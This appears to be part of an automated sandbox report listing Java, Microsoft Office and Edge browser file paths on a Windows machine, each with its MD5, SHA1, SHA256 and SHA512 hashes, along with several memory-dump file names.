memory/2128-3470-0x0000026377380000-0x0000026377381000-memory.dmp
C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\msvcp140.dll
| MD5 | 3718c9de534a250c91af369b68cec585 |
| SHA1 | 0f34b9a3b5dba1f9873c257e7ead475134ec3862 |
| SHA256 | f2c5a7bf2f786729098a2c968d692dfc930b9992bb1d924c3e3e0158c66d1806 |
| SHA512 | c91e42877a5793f3857a052616e424e6a705f7f388f49c189c52549b33719075c1762cbb171bc7b7634443e470428de60b349d3e66dbab104d7a47644bbd4c1b |
C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\vcruntime140.dll
| MD5 | 8b883cfb828e42d37338ecfd5be914f9 |
| SHA1 | fc6a3aa4613ccba7144e4ea0bfc65d583fba0750 |
| SHA256 | b7de8344794a8e56100fc90b16932fc3bbfbecfb1835bd91e550d2b80cfd710a |
| SHA512 | efbd59968258fb528ffed32d9c15cb8de4dae30ba9edb9c8fdf5ca0c57c5f23e7f51e17b2459853b1cf8b86cb61ceca2bcdc43b34942dc9221c48b494c014c95 |
C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\vcruntime140_1.dll
| MD5 | 26ff67284dc3aad964b49b24a590760a |
| SHA1 | 96da840f7cd1de5a41d8a99d79fdb4e85739b2bb |
| SHA256 | b6385bc4bd4c360bcccd9ec85ca45d07f58081c9c40a7b41020f01dbb374dd37 |
| SHA512 | dde58f02c3eab34c91729b2a75d8ef4be220beae0a22e3f80b8a892ec0dd6c0ef68f2a2c11afa71c59059ec04254b238f678eac06223f20c642dcbe46bc972d0 |
memory/3592-4133-0x000000001BC60000-0x000000001BCC6000-memory.dmp
memory/3592-4135-0x0000000003110000-0x000000000312C000-memory.dmp
C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
| MD5 | c30c07baa17c138a13e17052d3fa7cf6 |
| SHA1 | 47f192d626aa1af95002c8360b9747e98994a521 |
| SHA256 | c96ca9888057e1db1eb54683f0edccd096423260557f74100af24477851cefc9 |
| SHA512 | 881c0123c794f2b6b034cb18bd69ac3c31d5947e01b680b46c0973a498d5f9b45a89acf7907fa23ca1c2691dd900931aecbe5795c187fde1f2e696166a825d90 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 68de3df9998ac29e64228cf1c32c9649 |
| SHA1 | be17a7ab177bef0f03c9d7bd2f25277d86e8fcee |
| SHA256 | 96825c1e60e4a87dc5dbae78b97104e6968275fa1602c69053d0192cae143f43 |
| SHA512 | 1658b0bc504a8a5c57c496477cd800a893d751f03d632ef50aff9327cd33ad0e4e4f27bcb85b20bd22bef2ca65600b7d92e2a1f18fd3d08ad6391983de77beaf |
\??\pipe\LOCAL\crashpad_3720_VYSNEEOFGGNYZRVX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6f738fcca0370135adb459fac0d129b9 |
| SHA1 | 5af8b563ee883e0b27c1c312dc42245135f7d116 |
| SHA256 | 1d37a186c9be361a782dd6e45fe98b1f74215a26990af945a2b8b9aa4587ec63 |
| SHA512 | 8749675cdd8f667ff7ca0a0f04d5d9cad9121fd02ed786e66bcd3c1278d8eb9ce5995d3e38669612bdc4dccae83a2d1b10312db32d5097ef843512244f6f769a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0851c25fa93e9be4bba7565c40920b32 |
| SHA1 | 22fc4edb34d6c21bea6e806ddab83f24c0b83a13 |
| SHA256 | e9f10926e81326f0a4c43fe7f1c346ad56dd31e34dde91488b0cebcc0174254a |
| SHA512 | c0fa5083998b07bc29bf8d966f1db6eebbd86b9759c905b679dcfb7d16ef7612857baee2f55b547be52808ac07e6557640841aa7a3403d64ad35f96ae01ae528 |
C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub2019_eula.txt
| MD5 | 9f6949929ca656c791ebe02c48152ccf |
| SHA1 | 1286460cb7df2d96c69c43d6ce21114d57116c03 |
| SHA256 | 5316fdaecdb6d5d12bd8d1d5b0af2441a637e3fcb4bb6dbe1ad6b98e294458d1 |
| SHA512 | 1bde7ede376e8d55ef2743f439796b9f16937c44c895bb31d41e35f51cf875cac1c8e1f1e4fc5df3085f8e97d1829b53b6f27a5ab25f8412022b8b936ef130e6 |
C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Localytics.dll
| MD5 | 04992ba54c98703d1587f7e7bd14bb6e |
| SHA1 | d45161b17f67a5cfbff199b63df862ef698f42c5 |
| SHA256 | bb4a87c51ddd413ecee6a41edac55bebdbb323a7626a8b9adbd733c2b189e211 |
| SHA512 | 2b09199c686645d85df768bd9b5ee2c09abb6b17123a0ea1fe94a74ea28535b4091d90ed58e846aed6dccc4708fdb88e23157d12a88cff691b29d9b7f4e3b285 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 49f5e98ecd159cb4c93756da75546db6 |
| SHA1 | 722e251b1022b1bacc4546db849c0eec693236b7 |
| SHA256 | bcd52f56df29cf528f4ecfe583037117b878b16e2b799c9bc9517da1fcbe6953 |
| SHA512 | c3d4c32f57674bb2eef28ae6398dff196f0398c0a92d31b3f19a52fa2480a1dd56308588d28ff4aa524341767e12d2b1aaedb7f468088566dc5a922b5feb1fc1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8d79f001d7601c5310f81f5484e6510a |
| SHA1 | a2eeafb300b88e8449c974e6469bcb1a5ddf5e9f |
| SHA256 | 733a42a4330b8556c65f245e0e96457a80b355073350a2182995fc397dcab32e |
| SHA512 | 72fe4999d566a8e87909d77c5764f0d05cc300e963a6bb031ddbcb37974ea28c15784c408ba3ce7d9f2dbc520fc5ce1cdbf3db70c24631b4d9889d774bfcf713 |
C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll
| MD5 | c3de2e0ef2390208308d19a667511d7c |
| SHA1 | aafd4b775254040f75ca42dde63b046f8cbc303b |
| SHA256 | bf5bf44f16687a3283b454d28aa0bcd1366207b1cb8e613954be134213c1556c |
| SHA512 | 0e33e40be8b9c47e0d432e3d1cd1547042d7ec7904ebff4d0806133948f0b47b0a74a75f30a46a09baeb1e6b6668030368875b3bd91d18e3ed4ff86282d4ab79 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dll
| MD5 | 339c6be0eab616094ea3396922b07939 |
| SHA1 | 01aed2283df54a5fd3eaa3be4f2f34150b11e731 |
| SHA256 | 4cd00bd528f99af87460a8d49ae99d391e22b124ddd2731571f10c68cebfee8e |
| SHA512 | 5740312ce9c4346196fb6fe5b25a9e5fe5910aea84e018d913ac786ffe5c2018fe6ed2fc8c7105dd8c6404378479646bae9c93a0e75edf76b687fbdc5afef43c |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dll
| MD5 | 54f0489fe04448cffaf9390692c22463 |
| SHA1 | 6ce434026a626fb5b07cb0e9b39fb4b0946ddca3 |
| SHA256 | 6fef35d904c82c9a5706edfd9105482cc63132651a468b6b368c25e64a7cddf4 |
| SHA512 | 3031b323a2ffa8423f9fe86c60003194c97bd9b1a88cab8658e9b7208af3e862a5a18ae18fdf71a6df68de4e3f1b73bf6c4301867f1339e1bbf7a14afc959d4b |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 54fc546b71b78e7beb9589b02d33e054 |
| SHA1 | 2a97bb834646e3e3899b8f851a76ce25f99465f8 |
| SHA256 | 993cbad15c696310e2085080ab2cb56d0e5ace98f968077a74dd01bb93d16cc6 |
| SHA512 | db3d89190db3d5f9da4e72163f5886c0dd8176857ead49305ce3e0af8655306afd29ed0fe18de426ebfc99354b247d166f78e7ec754c3efc424528d644b21da8 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | b490d4c8ebcf01e65b2d6eb239d82420 |
| SHA1 | a376aec1ae9538cf95f8b474215e2981522c1468 |
| SHA256 | 8bff7db2ba3c699d9db85a90905defc041cb87b72dd7cf6040576c80ec102175 |
| SHA512 | 179a1e5b8f2dd1a06cd5bce3a0108fa6aae03471aeb5211b3c60abdee8b056440f6ede0d7877021ead99403ec805f4c1de875cf8e21be7247c4363752711e9b3 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 7910690e6c08fe8b229f795e81a9d6ba |
| SHA1 | c344232aae69dd3cea6b06e427b1cb5b4f2ff558 |
| SHA256 | ab9484ff92d5586f6c76ad2f270c5afed8facc21f96a08f25126b9af23abe465 |
| SHA512 | a06919224b6c1f52bda9c66386470bc775e5c4f3173b2259524781e789eb32df6bd52e74f2d5f888008b27bf364073e927a66683e42cc22f0b82a143728cede3 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | d15dd921cbf9e0d81b94eb86b0b7101e |
| SHA1 | 1d94ce2f5ec4f00ed76f8643efc3917dd5d46e54 |
| SHA256 | 72bee22cc33d7d615a7136fdf9963333050674d0d9b54cf032f552e25fbb4b8c |
| SHA512 | da41225f9791ded813276a1934ff415ce98d84f46876c9ffa8e89e69692957677202807dac08674fb606406a3e90d5ee9a0087a96bba06994b08a9369734e31d |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dll
| MD5 | 7b0360a1cced425944e906d15d09a90b |
| SHA1 | 4c323e300de86a36631f4add3afca1df1b379e6f |
| SHA256 | 434a01b0b3807d7084471263f42bcc07c8e3be23abdc2585457a2840cc410c5b |
| SHA512 | 30fe2b5871ebd8540c5eaa7c20f4f7ef06a6aba380e7dfd58016a4d4ba2c34d9b82371842eb20c91593aee2a23ca053739da69441f88b5673af7a11982f74150 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 0bf68146c22ec9c984f0de95097c2331 |
| SHA1 | 21c61b244d8a6c0aa037af73ec5259ea42d6bd02 |
| SHA256 | 4cab91bbcf997a1d76f6b7b7db543cf1d8b087d696c73c46d79286a0727b91c3 |
| SHA512 | d59892ced522469855464306a4364aba9075288e37a63143a9d670e636e22fc217f80e4e621ec6592b6554643526bd23bec7ae10b7d20e27664dc3c25505aed1 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 48d0edc9716f9c61bc247444abdb2121 |
| SHA1 | 2c58d6d7fb83d343099ae6b001ccd715a543ea6b |
| SHA256 | 52b13667ab66bfd3f717e17e6edb722dc42e6c655658f03a9c42d2079c62481e |
| SHA512 | 09abfcfe65e5954ec61f7cd53aa690ce8cb22639019356e2362175a6ac596478fb833c023d9f72d32c9084c04107ced01ecb1a899fd4b3241f9e2520d113ff51 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | b294d35d575c1645c13f808aa45124d6 |
| SHA1 | ccfa5e49dcfb040ad4576d728265c7debb87eb00 |
| SHA256 | 883782d4b835b2c862416bdd63fecd171f1dcebabeb181512ae6048b095fcb01 |
| SHA512 | 77d50b50241af441a4e7c68ff0a0cb03bfb7b40a9459977682cd2e604932ce1568902b0c195bd373b693350ef2faa1fcd156d038c8da76c1b317fcb24db2a4dd |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | ec64027d9a14cfeb84df2b3d81431d63 |
| SHA1 | 40bca743662d2d7298bbbe1440d65c5881854f45 |
| SHA256 | 77bb3f665f04654addce7de80224a2f0c609ed2417bcc53154729ff71c9759af |
| SHA512 | fe68bea1d24f02833625f999dd29829b8d8ba371e1b25cf6733b800f4d26aea59f8713c580d02e732656411934b9edd43dc2fd57ec3216579635b6a3a95d1669 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | f8a3bd5966a848bb9b45610def88facc |
| SHA1 | 7b2c51dc6598f993e101263d1d8dbaff01e5bc12 |
| SHA256 | a6b653163c6b0a891ed66658187e4607763b344720194411a93227652a0a4034 |
| SHA512 | 2315dd9311cde42a1a0e6435709ffa9d2368d917cd030f45ef447a23262ca100f2182ac43b8308a747682a1f7b799fe26fe8f37fe757da3eb265adeb2092dfe2 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | cf93ae98901a9e1ff484da3ddf50de30 |
| SHA1 | 09fa8286fa39778940a95ffd3a99432e9e436832 |
| SHA256 | 656f39d051e9be98742237de26a921ca488cb588c1ae2807f907c90877a8c82d |
| SHA512 | a69f6d5e96d73c0052948687e03e6630451d8c0a554fd41432d7f2ce68f5677ab63aded294c6378ac0ed7959b8540c4c8cc26606293d602ca72713c267069355 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dll
| MD5 | e1c38947ee1f511d818dce91c75021b7 |
| SHA1 | 3cc88db0d4e0cbf752f7bc559e3d710edf4bccd8 |
| SHA256 | e7a0638ffc1953fd09f5e8e9a13d10617df49e176b1e1efce9ba2c0dccbbc60e |
| SHA512 | c24686fed93491afa3fafbeb57262c80149bb8beb230fbbdcb3a594e3f95dcfaf42f88a4f290cfbc74f71fc4c98152cedb174e4e75d3721f003f7c8189d67690 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dll
| MD5 | e35d8dc16da6a13dcede94c1ece3965f |
| SHA1 | 91b980d8d70dccab1382318ae2ad347f5c9104c9 |
| SHA256 | f2defe88ddaf2f784bfaecf473f12502a4020dcfd12d35212d90789f489ce85b |
| SHA512 | 58f3d99cfa23a35f65adab72932ad3e59923b253a1deed7db1d8f889f196d52b1461a4a6b968af27307840159dd09b34d03e4d2304d2b120474f4d90b7dd4e74 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dll
| MD5 | 9b4372688253d12b26dfddf4d0f177dd |
| SHA1 | 41f8b6699cc20582ba11d03a7bf19213eb4dffb9 |
| SHA256 | b0fdc733249a01b82ef3ae0dc5efbc21ea58c9445425047daef59294d663e248 |
| SHA512 | 19ad249ab54807c7f409113ffa6c7ad6cfddc989e57b76699e072c4ae8b430da33856aafbcc084de3f4cc8d7b2cd109e55fbd930418caeae80dae39057012bde |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dll
| MD5 | caa1a1037126cfe39f529b88e7e946b1 |
| SHA1 | 22bd24472237687c7bd645def734e95a27c23098 |
| SHA256 | 0d71b6088457963be4dc7811e046880bef6973ed7905055a57b02931b0051649 |
| SHA512 | 80871efa061a9cb1cffee94aa6c68c90bf2bc2ca4e838c29358925279ee46208b60e2ec37327bb185195f8f20ba748167ad36d73b2b57f38cebfffef689a551f |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | bcb976775c72fc4210b665ce5a24ccd4 |
| SHA1 | a04a419756f5d612d7c8f4efea02b11796460611 |
| SHA256 | 26db9ae9ec8c5824cf52ec23ce4a19ca364e1eba7af01bbf84669bba497f3dc3 |
| SHA512 | d30772629f7604efca2514311bb5d6e5e16cbf175e6c2403bc5209e6bb0db736f893331554aa7139d158550360a848fdd3b0aecd6c600f6b0647c82848f9b0de |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | bd29e8e3f87aa3943dbfbe4434fb02f0 |
| SHA1 | e37356e2dcb2ee386a78e4e2a57f44518ece4177 |
| SHA256 | ef8e00bfab2a614f817f3a095ff9f6885c6627d9f8c564090c516f6dfe41fed1 |
| SHA512 | 00c5237c443a9cd9949eb37a02710fc875a2d707484eaceec628fefbb0afae99fe8940a436cf0cbedd7c4bbc0bea05dd4ea77242d8fb317fe223a615089a0639 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 7aaa0b61f9286f599fa89e4477617c77 |
| SHA1 | a0227ff00c861153dc56f85256b933528ab41611 |
| SHA256 | 851b76ceea7bcc456509257b6d9418582f669482eb2bbccebbddc6eac36dcc62 |
| SHA512 | bdac8e4ab872d36350e330444cd81d2d924d74b73904b677a1c418702fa822e889121ace8fae5b0832da7c19fb83efe7c291f9acaf27c5421f84455b79d5a7e6 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll
| MD5 | ad7dd997399c01fef3512f53bfa03365 |
| SHA1 | fb28aa981375a33843b949b2d35e95077be634f2 |
| SHA256 | b27ace263543682a8f4cf3e197a70e9f72fe41f30ef8c2fd622268a7a2d7ed71 |
| SHA512 | 98cda9dffc7245495e462fb909b587e37ea776b3eddbd6cc75aa8b4395ff7f80623b66953b2ec2e36fbeb316c6afe52fddbb342908881272dbbf726ae95195b9 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | 16378ce15b64cbe3b679ebe5df6fa654 |
| SHA1 | 67ad1e257a3d5c27d2eb960638d84da613dbe1fb |
| SHA256 | b94f15fe4f5458e812fa758e141ce7289e6170e5bf4e1e61932756c668629b86 |
| SHA512 | 60bddd8a4f2a1bccd85ef16961e10aa7e1ca2e84ddd7b44e09d961bdb70ba1fa689dc19bec4c1ce0ef847c6c86feaa7932eb16d6a7d7465e07ca9bfca058dc5f |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\concrt140.dll
| MD5 | c1b6d2ad5bfb8221c3923c7bae7b5589 |
| SHA1 | 5b2810f96c363303e7b3877f4a3357f532906dda |
| SHA256 | 8e8f582b9b2488b2e634a73d845de7277c222088b999ebe483c2857f0e3e75fb |
| SHA512 | 7438b60821c0aa528333899bdb9c0aa500cad5c50dad15758ce01d1620a203faf8a435949208fb4ef7b3dfeb07152ee73fa66f8899037d7b15e35e4a8056b214 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\mfc140u.dll
| MD5 | aede477b557ec1c0fc9f7a82a548242f |
| SHA1 | 19e9f21eb84f16711fcdaa893bd53e33e3c5c6ed |
| SHA256 | c146526825375b0adfe75354d18391e93e760c657ee8020c535f1d6922e4a89b |
| SHA512 | e7e54c5c19a1d6c3fa4de47a28e4455b41669cc5399d063b35af3d41d7fc5c5c6278153952b6d455be4e62d2d56cd2c323677130f3e669ed07691921e88b3afe |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp120.dll
| MD5 | 339070b0dac735546dde4f364cadced8 |
| SHA1 | bcbcb401f9939f3bcb3ead22e5136e3dd621e3a6 |
| SHA256 | 1f17bff1d7b7a7615172db66e2fcaf85f437479a7c31e599d81fb647000c85c4 |
| SHA512 | ea7db94184d313a1efcbe89f867f8002228c2b367abde6718b95ae12c138902dc8be42c1910af82a746eeaecafaeb21cd08e62fc8485f6fd9afbbfd79300ab37 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll
| MD5 | 5841ff1adb3d3b5d734b994cebc888a5 |
| SHA1 | 1f1a7f915da2e63a26ab19b427af3f5d91ce8112 |
| SHA256 | 6aca9012908543eb4653558887a79b095243ed5b4d94dae6eb0dbc1da1110805 |
| SHA512 | eb300d5dd1e8d72a77b9eaec167ad1b35a8aaaee2194e942bd283bc4516e292f0d8e986c0759a5e41feb8591872e333b29532685cc9226400877c822479f3172 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcr120.dll
| MD5 | 2ca3a080fab4bf7784c3fe7ce08da1f2 |
| SHA1 | 8149e9b2e3680d14a25c6ee6e727e0a912372505 |
| SHA256 | 4eeee3e13f59013dc4a8fce6f54c8cacdffc3d347f0c998efd1db334878e8f77 |
| SHA512 | 7ac3f980e436e2ed69f15e9f14a4f226fce62c8c251c6ed76a0c10bfa93d9b2166a6f8dc062aa48d7d2afc1ee8173c11132e6fa8eeb37aa26b61905a7aa3b6ac |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vccorlib140.dll
| MD5 | 00ddfeafa86428f64f482ee81b12b4af |
| SHA1 | 3474fcfbfd65488913c52912235e671b0a27bfa6 |
| SHA256 | c5bf6f563fa0f108a232a1ce11c0a5bf441ca7abf14fb96185f6627babca0709 |
| SHA512 | 96246ac4380d5f6a5b4af61a4329211b2fbff8bcbc79bdd8912a6480806713731ba1ecd36933bf940e9a75e9e32aa8cc527f455d63051361b588905c18f59b53 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll
| MD5 | fb7f6e24e5dbc7e22838136265c1a27d |
| SHA1 | 25f1eea2b3bd6021eb6bd60ccf9f1e554adedd9c |
| SHA256 | f18624b5eaf5294e38e43018eed61cd1cc0c2259758c86d9e0158fa1ba0eda18 |
| SHA512 | a9641ebb2c7b42f8b67bc4b0963869c2bbb3728c250ea80aabc1a2fc5f9e7244bece98ef137571b71a64fc7432ee92e02d977e2b83a850d3e3466b73664f0bf7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a19dd032b946735ab38954a3aa88d4ac |
| SHA1 | 1bc90ccc54518688bd7407d2c1d72d3d69f23e5e |
| SHA256 | 5ff50a545059d39ea5d0c3dc3360eb805555f5240b42374098875e01c5b84561 |
| SHA512 | 93205ccb6945d3d7375e548569625c95450fb20e6024506028abbda353f5290e8f20e7b6f98653019f38d56c4add7539c5b1f5823a73394727c7ec130ae0997d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | b29bcf9cd0e55f93000b4bb265a9810b |
| SHA1 | e662b8c98bd5eced29495dbe2a8f1930e3f714b8 |
| SHA256 | f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4 |
| SHA512 | e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 4856da29d1ded5194dc849a3c5ce4d5d |
| SHA1 | 36f294930a6517501462d46c8c31cd490125c2af |
| SHA256 | 9e9932db333129693f9e0387770fe5c15bb4ba64fe676ff990d928c66691403c |
| SHA512 | 110ded386a499918c84d45a478d6e776c6ae471e7173ccf7ab805f1cadbb020f75eb48fda0d3cfb1a39ee138c884edb80e0fb4a85b7bd27f80350e766fb0e922 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | 887940ae8434a6d10f06bad8c7707072 |
| SHA1 | 82c5dd09ccb2ceed1f1413e1590cc03d182b9a75 |
| SHA256 | 77d23be4a2076e45eab078157588ee7ebb0f560b2ba889cb667404a270abf369 |
| SHA512 | e8b0acb6db5fa059ac1f42910507c03f150865e1407edf84195202ae303f81a0862ef58bfc141f6b809c7391bb5332702f75b55340852b7b41e723590b164473 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | 3a20cf9a7a634e0d361dab0a29bf4038 |
| SHA1 | 534788415b5c4eb02a6cbd28e2084dff4428b349 |
| SHA256 | e6c559294b773b3d2cd1d548d57153854bbb81f141183ebef320c281371d4a1e |
| SHA512 | c6042277a5101aed275b6a262fd365a6683a454a8d2d933bc9e4ed8e33799ad84b62903752ee80f6cfe10838a36304dfca689d0dc716b95e3a6efda0cdd9e9a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 5af946addf5bd8de4a5a58e1eb40adea |
| SHA1 | a5063056250b729cf06f0461dd1a52661a74c705 |
| SHA256 | 6a3a6a098731d9301d52b5fa00f5bca62c71e70d0ebedee66793895e8f4d5598 |
| SHA512 | 0ab29d35a822ade2ea83ee8385b936e4ba74fa2cbe74df6821f931007acf00be7fea3467de6c398a05dcc76d09ba8d9b37637f55cdbfafd77bf44e590a0b662a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1286128766a668c969dac0be3293b3b8 |
| SHA1 | f84e539bc17c174ea5361b8483108554364a6b6d |
| SHA256 | 3213d8eac2996a1b604a426eac8c830b10bde3512420a31a1bf00d343e6a6cc5 |
| SHA512 | afc9d8c1cdc305fd48af0aeaa36084bd5ea3a5a20a945559fd3d7aa0084349f288a99e446d9c3409862da61d9d938e3e50c973b6781993485a82e2d9c407e2df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 6f329bdd5270b70ed8ff3fbec3bef15e |
| SHA1 | a10dfb323e724d6ad4b9fa4ada40bb82021fa98c |
| SHA256 | 1daf50256a3745ee7cbd83ca68dce76434501a884357e16fd3fad5e9876284ef |
| SHA512 | 9921675fd0e5d7ff4b968e0407d19975c463c47f670d4757d6a9925f47966ed86ca79524acf529e4a0bec7a99312b25a372ac4a11d7cd588e4c90a765f0674d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13364160361192901
| MD5 | c4c1d9eeb2e3a0ff9b7612c592cd311f |
| SHA1 | 499c8136cac9ddd4095fa5cfde1789cd62d75158 |
| SHA256 | f7d17b6adec89423e1f00c2605b411d5261b9f05fb35c602ef9ce23beb5814af |
| SHA512 | d15015ba655f2b8dae824edefdc575f0603b5bb8d71e2cd68be9334157ff10a6cb37c53c268484da02b223b3f5f0de6d7dd7026cfea0788644c92e74e921acd0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 3fac0502c25e1978ec5388db755b89b5 |
| SHA1 | b582e2b3ec9f8b07ad17804b5c5f26c04ef49ffc |
| SHA256 | 97831cecd6663380d4d7b418f68ccc3cea65459214f084073da007f50991b411 |
| SHA512 | bc87021cfc5d01dd903103e5794968c2bbb7401187295923cf95d264be4a0ec746810e9fd6d148d8442a7b126ba74f7cb10fbd969113bd138f6260b5eb50b013 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | ad816d222ecc543439ba018144ba4707 |
| SHA1 | 9d0ee3626516382cf0ed2158a79998293f923b2b |
| SHA256 | 38746bd44dd30363ad88c46eb2ce3ef37f1add53fabe38398fb2e7ce082be7ce |
| SHA512 | a38d3e74f872f666b7d45618b98b8035014ed5007da31643baf2b5a8c2981a57a9a24cb9a6e5c45a3b1b394d1cacb866e7e8d2371887d602e33697c01145e581 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d7c6a461a4de68a749659e44bc1cac7d |
| SHA1 | 5d76e7b7e09c9ebeae77d18778702339f0ebb31c |
| SHA256 | 1abb1d1f5ac02ab26a23a14aa81283ce6688bc2a953332d510fcba720fc52479 |
| SHA512 | b4c8daefaf138d0f7a429e2ebc77b2c08d52e4249c50fcf4e7e5a2e143c393307585f104f221f3f43e47082750e49c9cd7ecfcdb7c321dd7c3bff406d8e9e0f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
